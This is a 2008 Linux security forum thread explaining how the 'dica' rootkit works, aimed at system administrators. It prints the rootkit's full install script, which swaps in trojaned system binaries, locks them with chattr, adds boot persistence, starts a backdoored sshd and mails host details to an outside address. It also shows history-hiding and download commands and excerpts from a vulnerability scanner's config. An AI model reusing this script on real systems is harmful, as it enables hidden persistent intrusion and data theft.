How A rootkit Exactly Works

drendeah · #1 07-23-2008

How A rootkit Exactly Works
By drendeah

When a hacker gains local acess to your computer, and then escalates himself to root, he will often install a rootkit.

Now, we have all heard of the term rootkit before but I know a lot of us don't know exactly how one works.

Let me take you step by step, how a hacker would install a rootkit. For this example we will use the dica rootkit, which is a variant of the popular t0rn rootkit. (For obvious reasons I am blocking the URL to download it.)

As root the hacker would run:

Code:

unset HISTFILE
wget http://url removed/dica.tgz

(the first command blocks his commands from writing to /root/.bash_history)

Now to install the rootkit:

Code:

# tar -xzvf dica.tgz
dica/
dica/ifconfig
dica/ls
dica/logclear
dica/netstat
dica/ps
dica/top
dica/pstree
dica/xl
dica/ssh_host_key
dica/ssh_random_seed
dica/sshd
dica/secure
dica/write
dica/sshd_config
dica/crontab
dica/read
dica/va
dica/cl.sh
dica/rdx
dica/xdr
dica/install
dica/.etc
dica/psg
dica/lf
---output trunacted---

As you notice from the list there are a lot of familiar file names there, ifconfig, top, ps, etc.

What these are, are modified cloned versions of the normal Linux bianaries, and when they run, they don't show processes connected to the rootkit, so the hacker is able to remain invisible.

One file that may have caught your eye is "install".

After the hacker has downloaded the rootkit, he will run the install file to load the binaries.

Lets take a look at the file:

Code:

# cat install


#!/bin/sh
unset HISTFILE
chown root.root *

clear
echo
echo "= Getting Ready To Assimilate Host ="
echo
./rdx
rm -rf /bin/ls
mv ls /bin/ls
rm -rf /sbin/ifconfig
mv ifconfig /sbin/ifconfig
rm -rf /bin/netstat
mv netstat /bin/netstat
rm -rf /bin/ps
mv ps /bin/ps
rm -rf /usr/bin/top
mv top /usr/bin/top
mv pstree /usr/bin/pstree
rm -rf /usr/sbin/tcpd
mv tcpd /usr/sbin/tcpd
chattr +i /bin/ls
chattr +i /sbin/ifconfig
chattr +i /bin/netstat
chattr +i /bin/ps
chattr +i /usr/bin/pstree
chattr +i /usr/bin/tcpd
./xdr
echo
echo "= Creating dirs... ="
echo
./psg
echo "= Gata cu procesele ="
echo
echo
echo "= Incepem creerea directoarelor.. ="
mkdir -p /var/run/.".."dica/


mv -f clean  write read lf dxr /var/run/.".."dica/
mv -f xl xdr rdx cl.sh va secure psg /var/run/.".."dica/
mv -f sshd_config ssh_host_key ssh_random_seed /etc
mv -f mh/ /var/run/.".."dica/mh/
mv -f scan/ /var/run/.".."dica/scan/

touch /var/run/.".."dica/last.log


echo "/usr/bin/.etc -t1 -X53 -p" >> /etc/rc.d/rc.sysinit
echo >> /etc/rc.d/rc.sysinit
mv .etc -f /usr/bin/
chmod 755 /usr/bin/.etc
chattr +ai /usr/bin/.etc
/usr/bin/.etc
chattr +i /etc/rc.d/rc.sysinit

chmod 755 /var/run/.".."dica/xl
chattr +ai /var/run/.".."dica/xl

rm -rf /usr/sbin/sshd2
mv sshd /usr/sbin/sshd2
/usr/sbin/sshd2

touch /tmp/info
/sbin/ifconfig |grep "inet" >> /tmp/info
hostname -f >> /tmp/info
uname -a >> /tmp/info
cat /proc/cpuinfo |grep "vendor_id" >> /tmp/info
cat /proc/cpuinfo |grep "cpu MHz" >> /tmp/info
ping -c3 yahoo.com >> /tmp/info
cat /tmp/info|mail -s "Host Assimilator" dicaprio_d@personal.ro
rm -rf /tmp/info
chattr +ai /etc/rc.d/rc.sysinit
echo
echo "                       [*************************************]"
echo "                       [************* All Done! *************]"
echo "                       [******** Way to Go Mancatziash ******]"
echo "                       [*************************************]"

cd ..
rm -rf dica dica.tgz

Looking at some of the other files included with the rootkit lets see what we have:

Code:

# ls
atd    cl.sh     install   linux.cgi  mh       psg       pstree    read    sshd          ssh_random_seed  va        xdr
atd2   crontab   last.log  logclear   netstat  psg.save  rdx       scan    sshd_config   tcpd             void.cgi  xl
clean  ifconfig  lf        ls         ps       psid      rdx.save  secure  ssh_host_key  top              write

Now lets look at the mh directory:

Code:

# ls mh
checkmech  mech.help  mech.pid  mech.set  mh  randfiles

And this is going to be IRC related, to turn this server into a bot:

Code:

# cat mh/mech.help |grep irc |head -4
Usage: DO <raw_irc>
   Same as the irc command /lusers
Usage: SERVER <servername> [port] [login] [ircname]
   a new login and ircname for the bot.

And lets look at one more directory.

Code:

# ls scan/
bind  ftpd  lpd  lpd.conf  parser  parser1  r00t  rpc  scan.conf  sz

Code:

# head -15 scan.conf
/*****************************************************************/
/**This file is used to configure the scanner                   **/
/**                                                             **/
/**MAX_SOCKETS : The maximum sockets to allocate for the scanner**/
/**You shoud probably raise it if you have a good connection    **/
/**1000 for a T1                                                **/
/**TIMEOUT  : The connection timeout in seconds                 **/
/**VERBOSE  : Will show the ftpd banner in the ftpd scan        **/
/**HOSTNAME : This is your real ip, it is usefull if you want   **/
/**           to own boxes with proftpd pre1,2,3 vulnerability  **/
/*****************************************************************/

What it looks like this does is, it will scan other hosts for a bind and proftpd vulnerability, and attempt a buffer overflow using shellcode which is in one of the other files.

Here's a question you might have:
"Should I download and install a rootkit to test one out if I am a system admin?"

Answer: Yes, but do so on a private network, it shouldn't even be a public IP, make sure its a new test server, and reinstall the OS once you are finished. As you can see from the install script, it sends an email to: dicaprio_d@personal.ro which is likely the person who made this rootkit, with your IP and other information about your server, if he has that and knows the backdoor port he will be able to get on your server.

Also there often isn't an easy way to recover from a rootkit. Sometimes the binaries won't work on your distro and you will be left with a broken system.

This article was brought to you by LinuxSecurityForum.org, become a member for notifications on new great articles like this one.

MandrakeOldie · #2 07-23-2008

Wow, I've heard of these but never actually seen the source code for a rootkit before.

LuckyBambu · #3 07-23-2008

I learned this a couple years back also, this is very useful to know. It's important to know how hackers can penetrate your systems, will give you an edge on them.

randyvalpobb · #4 07-23-2008

Thanks for the info. Never seen the code as well!

Scooter58 · #5 07-23-2008

Please remove this post, you are promoting hacking.

drendeah · #6 07-23-2008

Quote:

Originally Posted by Scooter58

Please remove this post, you are promoting hacking.

How is a simple discussion about a rootkit promoting hacking?

There is no information here that would aide a hacker.

rootkits need to be discussed for admins to properly plan to prevent them and detect them.

As you will notice:
1. There is no link to get the rootkit
2. I only post the names of the binaries and not the actual binaries themselves
3. The related scripts with the rootkit, such as for the bot and scanner only have the first few lines posted.
4. The install script that is posted does nothing when run as a standalone without the other files.

TuxKevin · #7 07-23-2008

Quote:

Originally Posted by drendeah

Here's a question you might have:
"Should I download and install a rootkit to test one out if I am a system admin?"

Answer: Yes, but do so on a private network, it shouldn't even be a public IP, make sure its a new test server, and reinstall the OS once you are finished. As you can see from the install script, it sends an email to: dicaprio_d@personal.ro which is likely the person who made this rootkit, with your IP and other information about your server, if he has that and knows the backdoor port he will be able to get on your server.

I want to try this, where can I download a rootkit, like the dica one you are talking about?

drendeah · #8 07-23-2008

Quote:

Originally Posted by TuxKevin

I want to try this, where can I download a rootkit, like the dica one you are talking about?

Sorry, we do not give specifics here on where to get them. If you are truely a system admin you will come across one or a site that has a download link to one sooner or later.

Alejandro · #9 07-23-2008

Nice article!

...adding to favorites